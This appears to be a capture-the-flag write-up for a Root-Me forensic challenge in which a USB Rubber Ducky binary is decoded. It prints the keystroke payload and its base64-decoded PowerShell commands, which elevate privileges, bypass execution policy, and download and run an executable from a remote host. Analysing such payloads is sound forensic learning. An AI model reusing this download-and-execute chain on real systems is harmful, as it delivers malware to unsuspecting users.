## Version 2.0
## language: en

Feature: ugly-duckling-rootme
  Site:
    root-me.org
  User:
    ununicornio
  Goal:
    Find the flag in the bin file

  Background:
  Hacker's software:
    | <Software name>       | <Version> |
    | Kali Linux            | 2017.3    |
    | Firefox Quantum       | 64.0b14   |
    | Virtual Box           | 5.2.22    |
    | Windows 10            | 1809      |

  Scenario: Fail:data-carving
    Given I start the level
    And it prompts
    """
    The CEO computer seems to have been compromised internally. The suspicion is
    about a young trainee dissatisfied with not having been paid during his
    internship. A strange USB stick containing a binary file was found on the
    trainee’s desk. The CEO relies on you to analyze this file.
    """
    And there's a compressed file to download
    Then I extract it
    And get a file called "file.bin"
    And try running file on it but get no information whatsoever
    """
    C:\Users\yolas\Downloads
    λ file file.bin
    file.bin: data
    """
    Then I hexdump it looking for strings
    But find nothing that gives me a clue about how to open it
    Then I notice the challenge title

  Scenario: Success:rubber-ducky
    Given I notice the challenge is named 'ugly duckling'
    Then I think about the Hak5 Rubber Ducky
    And think this may be a payload for it
    Then I use a rubberducky payload decoder on it
    And it gives me the payload in plaintext
    """
    DELAY
    iexplore http://challenge01.root-me.org/forensic/ch14/files/796f752776652062
    65656e2054524f4c4c4544.jpg
    DELAY
    DELAY
    DELAY
    DELAY
    %USERPROFILE%\Documents\796f75277665206265656e2054524f4c4c4544.jpgDELAY
    DELAY
    DELAY
    DELAY
    DELAY
    DELAY
    DELAY
    DELAY
    DELAY
    DELAY
    DELAY
    DELAY
    DELAY
    DELAY
    DELAY
    DELAY
    DELAY
    DELAY
    powershell Start-Process powershell -Verb runAsDELAY
    PowerShell -Exec ByPass -Nol -Enc aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIA
    BTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAG
    EAZABGAGkAbABlACgAJwBoAHQAdABwADoALwAvAGMAaABhAGwAbABlAG4AZwBlADAAMQAuAHIAbw
    BvAHQALQBtAGUALgBvAHIAZwAvAGYAbwByAGUAbgBzAGkAYwAvAGMAaAAxADQALwBmAGkAbABlAH
    MALwA2ADYANgBjADYAMQA2ADcANgA3ADYANQA2ADQAMwBmAC4AZQB4AGUAJwAsACcANgA2ADYAYw
    A2ADEANgA3ADYANwA2ADUANgA0ADMAZgAuAGUAeABlACcAKQA7AA
    powershell -Exec ByPass -Nol -Enc aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIA
    AtAGMAbwBtACAAcwBoAGUAbABsAC4AYQBwAHAAbABpAGMAYQB0AGkAbwBuACkALgBzAGgAZQBsAG
    wAZQB4AGUAYwB1AHQAZQAoACcANgA2ADYAYwA2ADEANgA3ADYANwA2ADUANgA0ADMAZgAuAGUAeA
    BlACcAKQA7AAoA
    exit
    """
    Then I go check the image it opens out and see [evidence](image.png)
    Then I try to understand what the powershell commands do
    Given the last argument of the PS commands are encoded in base64
    Then I decode them
    And see the first one downloads an executable and the other one runs it
    """
    i.e.x. .(.N.e.w.-.O.b.j.e.c.t. .S.y.s.t.e.m...N.e.t...W.e.b.C.l.i.e.n.t.)...
    D.o.w.n.l.o.a.d.F.i.l.e.(.'.h.t.t.p.:././.c.h.a.l.l.e.n.g.e.0.1...r.o.o.t.-.
    m.e...o.r.g./.f.o.r.e.n.s.i.c./.c.h.1.4./.f.i.l.e.s./.6.6.6.c.6.1.6.7.6.7.6.
    5.6.4.3.f...e.x.e.'.,.'.6.6.6.c.6.1.6.7.6.7.6.5.6.4.3.f...e.x.e.'.).;.

    i.e.x. .(.N.e.w.-.O.b.j.e.c.t. .-.c.o.m. .s.h.e.l.l...a.p.p.l.i.c.a.t.i.o.n.
    )...s.h.e.l.l.e.x.e.c.u.t.e.(.'.6.6.6.c.6.1.6.7.6.7.6.5.6.4.3.f...e.x.e.'.).
    ;.
    """
    Then I download the executable
    And run it in a Windows VM
    Then I get a popup window with the flag [evidence](pass.png)
    Then I pass the challenge
